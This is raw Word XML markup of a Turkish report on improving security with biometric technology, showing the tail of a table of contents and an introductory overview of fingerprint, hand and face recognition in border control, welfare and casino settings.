          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Yüz tanıma</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>22</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>El ve Ses</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>23</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Yeni olan nedir?</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>23</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Yüz, Ses ve Dudak Hareketi Entegrasyonu</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>23</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Giyilebilir Biyometri Sistemi</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>24</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>ATM Kartlarında Parmak İzi Çipi</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>24</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Kişisel Kimlik Doğrulama</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>25</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Diğer Yeni Şeyler</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>25</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Microsoft Faktörü</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>26</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Standartlaştırma Sorunları </w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>26</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Seçim Kriterleri</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>27</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Sonuç</w:t>
          </w:r>
          <w:r w:rsidRPr="003E4991">
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidRPr="004F1B43">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>27</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:rPr>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="004F1B43">
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve">Siteler  arası komut dosyası çalıştırma (xss) </w:t>
          </w:r>
          <w:r>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:t>28</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E77DF4">
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BİYOMETRİK  TEKNOLOJİ İLE GÜVENLİĞİ ARTTIRMA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giriş</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05BDF3BA" wp14:editId="633BECA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-13970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>163830</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5753100" cy="2714625"/>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5753100" cy="2714625"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0"/>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:bCs/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004B6FA4">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>ABD Göçmenlik ve Vatandaşlığa Kabul Hizmeti, ziyaretçinin elinin elektronik olarak okunması için ziyaretçinin eliyle elektronik okumalarını alarak, belli büyük havalimanlarında sık sık Amerika Birleşik Devletleri'ne seyahat edenlerin kişisel görüşme ve inceleme sürecini atlamasını sağlayacak bir program başlattı.</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:bCs/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="004B6FA4">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:bCs/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>Benzer bir sistem Sınırdan geçen insanları tanımlamak için parmak izi ve ses tanıma kullanan ABD / Kanada sınırında kullanılıyor.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0"/>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:bCs/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0"/>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004B6FA4">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>1991 yılında Los Angeles County, ülkenin refah sistemindeki hileli ve çift hak taleplerini azaltmak için parmak izi tanıma kullanan bir sistem kurdu. İlçe, ilk altı ayda 5 milyon dolardan fazla tasarruf sağladı.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0"/>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0"/>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004B6FA4">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>Las Vegas'tan Atlantic City'ye kadar olan casinolar, kayıpları azaltmak ve lisanslarını korumak amacıyla kumar hilelerini, kart sayaçlarını ve suçluları bulmak için yüz tanıma sistemlerini kullanıyor.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E7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F3BA" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Metin Kutusu 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.1pt;margin-top:12.9pt;width:45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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:bCs/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004B6FA4">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>ABD Göçmenlik ve Vatandaşlığa Kabul Hizmeti, ziyaretçinin elinin elektronik olarak okunması için ziyaretçinin eliyle elektronik okumalarını alarak, belli büyük havalimanlarında sık sık Amerika Birleşik Devletleri'ne seyahat edenlerin kişisel görüşme ve inceleme sürecini atlamasını sağlayacak bir program başlattı.</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:bCs/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="004B6FA4">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:bCs/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>Benzer bir sistem Sınırdan geçen insanları tanımlamak için parmak izi ve ses tanıma kullanan ABD / Kanada sınırında kullanılıyor.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:bCs/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004B6FA4">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>1991 yılında Los Angeles County, ülkenin refah sistemindeki hileli ve çift hak taleplerini azaltmak için parmak izi tanıma kullanan bir sistem kurdu. İlçe, ilk altı ayda 5 milyon dolardan fazla tasarruf sağladı.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004B6FA4">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>Las Vegas'tan Atlantic City'ye kadar olan casinolar, kayıpları azaltmak ve lisanslarını korumak amacıyla kumar hilelerini, kart sayaçlarını ve suçluları bulmak için yüz tanıma sistemlerini kullanıyor.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bütün bu sistemler ortak bir noktaya sahiptir: hepsi insanların, yerlerin veya finansal çıkarların daha fazla güvenliğini sağlamak için biyometri kullanır. Biyometri, güvenlik alanındaki en hızlı büyüyen segmentlerden biri haline geliyor ve hem popüler basında hem de güvenlik mesleğinde büyük bir popülerlik kazandı. Biyometri kullanımı - nasıl çalıştığı, nasıl kullanıldığı ve ne kadar etkili olabileceği - bu bölümün konusudur.</w:t>
      </w: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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Biyometri Temelleri (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Biometrics Basics</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yunan kökenli olan “biyometri” kelimesi kelimenin tam anlamıyla “yaşamın ölçülmesi” anlamına gelmektedir. Daha pratik kullanımda, biyometri biyolojik bilgiyi ölçme ve analiz etme bilimidir. Biyometri kullanımı, canlıların (tipik olarak insanın) çeşitli yönlerinin ölçümlerini almayı, bu ölçümler üzerinde analitik yargılarda bulunmayı ve bu yargılara dayanarak uygun önlemleri almayı içerir. En tipik olarak, bu kararlar ölçümün konusunu doğru bir şekilde tanımlamaya yardımcı olur. Örneğin, kolluk görevlileri suçluları tanımlamak için parmak izi biyometrikini kullanır. Bir şüphelinin parmak izleri olay yerinde toplananlara karşılık gelirse, şüpheli daha fazla sorgulama için tutulabilir. Parmak izleri eşleşmezse, şüpheli serbest bırakılabilir. Başka bir örnekte, güvenlik kameraları kalabalığın yüzlerini bir futbol stadyumunda tarayabilir, ardından taranan görüntüleri terörizmle ilişkili olduğu bilinen kişilerin veri tabanına karşı eşleştirebilir. Kalabalıktaki yüzlerden biri veri tabanında ki bir yüzle eşleşirse, polis bu kişiyi gözaltına almak için harekete geçebilir. Böyle bir sistem, Florida Tampa Bay'deki 2001 Super Bowl'da kullanıldı. Sistem, kalabalığın sabıka kaydı olan 19 kişisini tanımladı.</w:t>
      </w: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r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
